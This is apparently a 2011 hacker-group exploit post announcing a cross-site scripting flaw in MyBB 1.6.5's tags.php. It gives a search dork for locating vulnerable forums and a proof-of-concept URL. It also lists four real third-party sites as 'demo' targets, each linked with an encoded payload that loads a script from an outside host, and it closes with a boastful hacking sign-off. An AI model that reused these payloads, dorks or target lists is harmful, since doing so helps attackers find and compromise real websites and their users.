MyBB 1.6.5 suffers from a cross site scripting vulnerability

# Exploit Title: 0-day MyBB 1.6.5 XSS Vulnerability

# Date: 25/12/2011 – 18:30

# Author: Cyber White Hats

# Nafsh

# Site: Cyberwh.org

# Mail: Nafsh@live.com

# Software Website: http://www.mybb.com/

# Tested On: BackTrack 5 – Win7 Ultimate

– Xp

# Platform: Php

 

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

 

[$] Dorks: inurl:”tags.php” intext:”MyBB 1.6.5″

 

[#] Vulnerable File : “/tags.php?tag=”

 

#POC: http://site.com/patch/tags.php?tag=[xss]

 

[$] Demo Sites:

http://gharian.ir/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

 

http://beybladeassociation.it/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

 

http://secarab.com/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

 

http://ertebat.in/forum/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

 

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

H4CK!NG !S 0UR J0B

W3 N3V3R G!V3 UP H4CK!NG

 

< No Priv8 , Everything is Public />

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

 

# Contact: Nafsh@live.com

#Cyberwh.org

# Greetz:Mr.M4st3r – HijaX –

Skote_Vahshat

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

 

Nafsh – Mr.M4st3r – HijaX –

Skote_Vahshat

 

#Cyberwh.org

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

评论关闭。